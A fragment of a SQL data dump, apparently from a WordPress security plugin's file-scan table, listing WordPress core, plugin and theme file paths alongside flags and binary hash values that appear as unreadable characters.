:��','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��88A�`�w+��p�T','�8u]�p�Q_�t�Rۮ]o}e5#�P5b2BU��','',0,'?'),('���Sq�R{�\Z���=','wp-includes/wp-includes/SimplePie/Author.php',0,'?��hK\0�k�1���N\"','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѿD�\0�|����s�W','�\n*�v�Q��(G��i�u�3@��4��*���','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�]��4>�*I��w�','��خ`��$�%�T�{����rKN���k6��','',0,'?'),('����pF�&�P_','wp-includes/wp-includes/cache.php',0,'Z��V��O��yDv� !','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rz[�HH;nc�.u@�','��>�X�b]|$�Xq���@N�]m�Y�v�t��','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oO�W��,>7p����','0n`bl��y� �p�z]�Ջ,�^�+e��','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�;s�ռ�;\0+g�','��T���D�H.1\0�B6�E?{��s��g\"��$�','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('���U���֫��o�V','wp-includes/wp-includes/js/api-request.js',0,'9����߿G7p6{�g','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('���n�Ioc�!���','wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('�������e�5>X','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif',0,'��7I �1F�Gu�j^','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('��Y��hx\"Ԁ^��F','wp-content/themes/shootingstar/js/placeholders.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hr=$x������N',',4&�ְ�)_#�  l>��p�h�l�5B}���x+','',0,'?'),('���c����Vs�9�o��','wp-includes/css/dist/editor/editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0,	Ra�uhX��c���','',0,'?'),('�����@�j=�','wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR�1G˕�\n���hc�','����� ��^b��V���l!�,�G�3/','',0,'?'),('��h�c��f:(����','wp-includes/wp-includes/random_compat/error_polyfill.php',0,'X:,��t]7�=��Q��E','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\,yI����D�a','৓��}�u�}@�\Z�\\,�XK��r�;7f��','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P	nԔ/\rzA�\"\nd','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��~�vg��3ܘ�','�lAt;��#�Tt�_�y\\S=���#:X٥j�','',0,'?'),('��\\����\r� ��:#�K','wp-content/plugins/wp-cerber/assets/flags/bo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0-�a�vv��','=�IS}�@l��U�%s�=�FG41R�\'�','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���fQ����^','9.��A�������b1�e�7@xR��w���','',0,'?'),('��L�@��V����k','wp-includes/wp-includes/images/toggle-arrow-2x.png',0,'F���\\����CDr�','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('���q�V�Y4�n���|','wp-includes/wp-includes/js/jquery/ui/datepicker.js',0,'�4P1,ٝ�`x����','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('��.������I�\\�','wp-content/plugins/wp-cerber/assets/flags/jo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z>\Z�➶6�A3+Lh�','��\'\"5��zF��aLK�3pr��*�=�.>aq\"','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�8۝5:��?*)K','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)\Z���tU2Ec0\'�','�úM�..8��ѹ>Nw�j�Z����Wb��*B�','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���\r$��o��','l�?�9Rw\"H�^�\r�s�������\ZD:�F�a','',0,'?'),('�\np#֕z�S�yT~','wp-content/themes/sg-window/inc/widget-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GZ��\n*�a>+ͮvO/','�?�����r�uZ>�h�[\"/�]��Y���:$�kp','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��4�-��͕*s','��qO��j�[��=�\\����rc�8�s�H�','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�1�1]PC��g4�FU=','wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ �','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�󞮣Py�n','',0,'?'),('���R	�(�,	!)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��.v��d�Y��','R�Ŧ2{/�<fo\0t�|Og�7���L!����','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ	�\"�/�','',0,'?'),('���0f|{�km�@��Y','wp-includes/wp-includes/images/media/video.png',0,'����u�h����q��','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('���?#o��v��','wp-includes/wp-includes/images/down_arrow-2x.gif',0,'�]����M�����f�','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[II�[�I#i��','<�C~��-.�\0��9q�\\��}�)���~�[$','',0,'?'),('��	�ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR	]','',0,'?'),('�(������]dJ\rl','wp-content/plugins/wp-cerber/cerber-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ�9Twu*�Ҳ�i','��v� %Kj��׹�\\J��/��௜՝mRb��X','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�5�+�QW�C�!��j�T','wp-includes/wp-includes/rss-functions.php',0,' xr�6�2�\'�]�e�l#',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('�=��J��o ݣV`','wp-content/themes/sg-window/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��:��(v�s[,�','^R�ec�H�u������[�L�Lט�./�9�','',0,'?'),('�B9g�M\Z�fKUh��Z�','wp-includes/wp-includes/js/swfupload/handlers.min.js',0,'j��ڙK�~q	����c=','j��ڙK�~q	����c=','�T򌿑�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�Ƽz�g�L���','��t�Mp���Q�8=��~bw����/���','',0,'?'),('��b6���Rjs��!��','wp-includes/wp-includes/sodium_compat/namespaced/File.php',0,']�m�w�/�\\�y5�',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('����SSq�\r��F�\'','wp-includes/wp-includes/css/dashicons.css',0,',J��/��n�R�~�',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�����G���;9C','wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php',0,'ң-���с��','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('��\n)۞,�\\�؅/�r','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',0,'�+o~��X��ݓ\0�','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),('�����(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('��J�$R��_���o�','wp-content/plugins/wp-cerber/assets/flags/lk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m ���t�����','vl�a��tb�N���u�G�:���<?�7�=','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a`|��^(=`��hv','L�.X_	�DJ��tk��H��!|��ݔJ��x','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�c��D���o�	','|�!��^(��^�~���c��m\Z/^fŠ�[','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('� ��:�{�wL�','wp-includes/wp-includes/js/dist/data-controls.js',0,'����:�ԕw$ބ�j','����:�ԕw$ބ�j','�a���95�]��ꐺW�e+,�O��� &�u','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#	�Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�N��ZND��N�>Y	','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҳx���a��WS�G','��Z(	`#�=+BK�����5��\n�YCF�','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��ʆ�wq��F��','R�	j[�8ح͸�W����E�H��̅�a��I','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('����^�t�i�Gi��l','wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php',0,'�8�l��_\r�u���','�8�l��_\r�u���','��פme�,��V����9�}����	y���v�','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ո�8��>�R�n�e',']1�9{k��P�f�6з�ɏj�WI�	\n','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('�*���E��C�	�|2','wp-includes/wp-includes/js/hoverIntent.js',0,'��z/P���ꮱ<	�','��z/P���ꮱ<	�','t��neTR/�77�@\Zҧ0�g�nj����','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�R�C@�����4�I','wp-content/themes/sg-window/inc/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nN|��\\���','�kᷕlA)�f?Rx��&���ڭ�FY�\n','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Fɠm(��nJ��ZEG','�S�5��X��9������mOX�>s��l��','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�|Ѐ��^W�j=�T��','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/xls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sc�v0�ԴA3E��b','\"j�Q\'r�x�D�z�\'e4���Me��&�C�~','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t��\"N��+�՛L�','�67�E0�܃�ՐC�{\\a�dPb�2�+�pW;P�','',0,'?'),('��$��D[�ֺ,�d��','wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js',0,'6�\'1�Z����f ','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('�����۝w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('����S�D��~��p�v','wp-content/plugins/wp-cerber/assets/bn3ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\n`ehG�����}�','Ul,��/��g����Qg�\'���	�I�&','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��y\Z�pK�3����`,','\\\r�$��D�Tl�b��ANĄH�\"ݷ����8','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�Ss�li4��l1�','O[�~_uO�\r�i�e�s�^��ޘ���!��\nyK=','',0,'?'),('�� �L��wO�d98A�7','wp-includes/wp-includes/class-wp-session-tokens.php',0,'9]�K�UJW�*��h�=','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j򬪎$M��0�\0','',0,'?'),('�߽s�h�>0�\n�+4q','wp-includes/wp-includes/js/dist/i18n.js',0,'\n|7�>&���~�','\n|7�>&���~�','�W\n��U,���5��m�_7�qv�L-�K��P%','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�	��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��/���c�','�8�OG�I%��(�n6�)�lhf6f��','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6qigV�+�\'�^�N�','�����Bi�B�\rv�\rM5���\n9\'�d��р9�','',0,'?'),('�@��3���1��Ô','wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php',0,'�	�sL2/�B�����','�	�sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('�KG�����=]�F\0','wp-includes/wp-includes/js/dist/wordcount.js',0,'�T/�mWeP�X<x�}�t','�T/�mWeP�X<x�}�t','��[:�{A�I��BY��C&���Op\'6�','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�u��<e�x��@ֈˆ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >��>��S����b�%',' ʍ��LM>	�ύ��5́kv��k�PHɇ0','',0,'?'),('�zub�d��3��_T�?','wp-content/plugins/wp-cerber/cerber-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2?�f\\�~��1�D�','�+ ���+�6U��TRO�m�E�?<|�K�\nL','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!n�ΟӾ�)�X�','��aA=�M��X�绚����4#��A�iΡ\r���c','',0,'?'),('�����C�	#a��S�[','wp-includes/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\ZX�x�3)�','m�io�j�6XP�J��y��vx���ܧ','',0,'?'),('��>>Q���lh���','wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',0,'+\r��Π;K�۔�b/�','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OS‘Sfb��\r�E捵�','',0,'?'),('�\nǷ�J�A�He�qnQ�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',0,'����!�Й�~L�C��','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('�_��S�ަ�:{j�}','wp-content/plugins/wp-cerber/assets/flags/do.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���*{\0�4��sV','\n�/�H��Ҿ/���\\����-ܧ��Rx�','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m����{d�X��',')\\k���:Es�%vn�6Z�R\ng�N*1D��)&�','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�‡?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�!U�a�����D�*','wp-content/themes/shootingstar/js/menubox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4C)�b�4�y5�v�','ĦXu��\'�>߻���g���:O�Ѓ.n���','',0,'?'),('�8痣4���J����','wp-includes/wp-includes/images/smilies/icon_smile.gif',0,'��3�.)�2���p���','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('�=��X<;��r@��','wp-includes/wp-includes/pluggable-deprecated.php',0,'@���\"�j��2�ߖ','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('�Q��@O?�S�\r��9�','wp-includes/wp-includes/js/jquery/ui/tooltip.min.js',0,'a�\r��c5V����h','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ͳ���k�o�T��A=','�ӵ�f�K��N�_β�s:�v%�Y=����','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�tfF	�r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o�H?6\Z���x','(����%�����C��㏞�d�\"��A��','',0,'?'),('��5e-8\Z��Ι98','wp-includes/wp-includes/class-wp-metadata-lazyloader.php',0,'I^�P���;$�+\"�','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('��o|��lP�=�Q��I','wp-includes/wp-includes/class-wp-locale-switcher.php',0,'��\"�?�F�w,�T��','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('�ςHv���#,ײ/�7','wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js',0,'�?�~s���i6G�/','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('��;\\�V����AޅRd','wp-includes/wp-includes/customize/class-wp-customize-theme-control.php',0,'�	�K���WTՂ�c�','�	�K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('�!�-LHv�)��n��#','wp-includes/https-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�5\\�r���(�W','W�|�_`|\\��y{4�N���Vp����j[','',0,'?'),('�4$����\r#s7\Z��]','wp-includes/wp-includes/css/dist/block-library/editor.css',0,'0>>�~��u��WlY','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I	